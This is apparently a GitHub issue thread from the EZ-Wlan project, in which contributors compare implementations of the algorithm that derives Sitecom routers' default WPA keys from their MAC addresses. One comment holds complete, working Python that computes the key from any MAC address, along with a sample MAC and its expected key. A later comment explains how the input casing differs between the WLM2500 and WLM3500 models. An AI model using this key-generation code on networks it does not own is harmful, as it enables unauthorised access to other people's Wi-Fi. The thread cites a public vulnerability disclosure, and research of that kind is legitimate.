### ISSUE TITLE
Sitecom implementation

### ISSUE THREAD

**Issue by ruiaraujo** [WarkerAnhaltRanger/EZ-Wlan#2]
Are you basing your Sitecom implementation on this one?
http://blog.emaze.net/2013/08/multiple-vulnerabilities-on-sitecom.html

If so, the results don't match.

**Comment by WarkerAnhaltRanger** [comment]
No that's my work on the WLM2500v2 ..
thank you for pointing me to this .. i'm going to implement this too :)

**Comment by ruiaraujo** [comment]
ah okay.

It's so similar that it's probably the same algorithm.

What are your test vectors?

**Comment by WarkerAnhaltRanger** [comment]
Just tested one i've got from ebay .. maybe i've overlooked something ..

**Comment by ruiaraujo** [comment]
Can you post the MAC?
I think you have bug when the NIC is all numeric.

**Comment by WarkerAnhaltRanger** [comment]
Possible ..
tested with
00:0c:f6:d4:a9:f5

**Comment by WarkerAnhaltRanger** [comment]
my python code was
import sys

def myatol(st):
    res = []
    for x in st:
        if x <= '9' and x >= '0':
            res.append(x)
        else:
            if len(res) == 0:
                return 0
            return int(''.join(res))
    return 0

def create_key(mac):
    res = []
    # alfanum without 0,O,l,L,i,I maybe to prevent typos
    lt = '123456789abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ'
    mac = mac.replace(':', '')
    var_80 = myatol(mac[6:])
    a0 = (var_80 + ord(mac[11]) + ord(mac[5])) \* (ord(mac[9]) + ord(mac[3]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 0 
    a0 = (var_80 + ord(mac[11]) + ord(mac[6])) \* (ord(mac[8]) + ord(mac[10]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 1
    a0 = (var_80 + ord(mac[3]) + ord(mac[5])) \* (ord(mac[7]) + ord(mac[9]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 2
    a0 = (var_80 + ord(mac[7]) + ord(mac[6])) \* (ord(mac[5]) + ord(mac[4]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 3
    a0 = (var_80 + ord(mac[7]) + ord(mac[6])) \* (ord(mac[8]) + ord(mac[9]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 4
    a0 = (var_80 + ord(mac[11]) + ord(mac[5])) \* (ord(mac[3]) + ord(mac[4]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 5
    a0 = (var_80 + ord(mac[11]) + ord(mac[4])) \* (ord(mac[6]) + ord(mac[8]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 6
    a0 = (var_80 + ord(mac[10]) + ord(mac[11])) \* (ord(mac[7]) + ord(mac[8]) + ord(mac[11]))
    res.append(lt[a0%len(lt)]) # 7
    return "".join(res)

def main():
    if len(sys.argv) < 2:
        sys.exit('Usage: %s <mac>' % sys.argv[0])
    mac = sys.argv[1]
    #mac = '00:0c:f6:d4:a9:f5'
    #test_key = 'B2EB59yg'
    print create_key(mac.lower())

if **name** == '**main**':
    main()

**Comment by WarkerAnhaltRanger** [comment]
I'm sure I failed to translate something

**Comment by WarkerAnhaltRanger** [comment]
Ok i've translated your python code .. lets see

**Comment by WarkerAnhaltRanger** [comment]
there seem to be a mistake somewhere in my translated code .. going to investigate ....

**Comment by WarkerAnhaltRanger** [comment]
I found the difference .. it's just the uppercase of the input mac.
mangle_key is just a modulo operation so our code is identical but the wlm2500 seems to get a lowercase input and the wlm3500 uses a uppercase representation. I will implement and show both keys
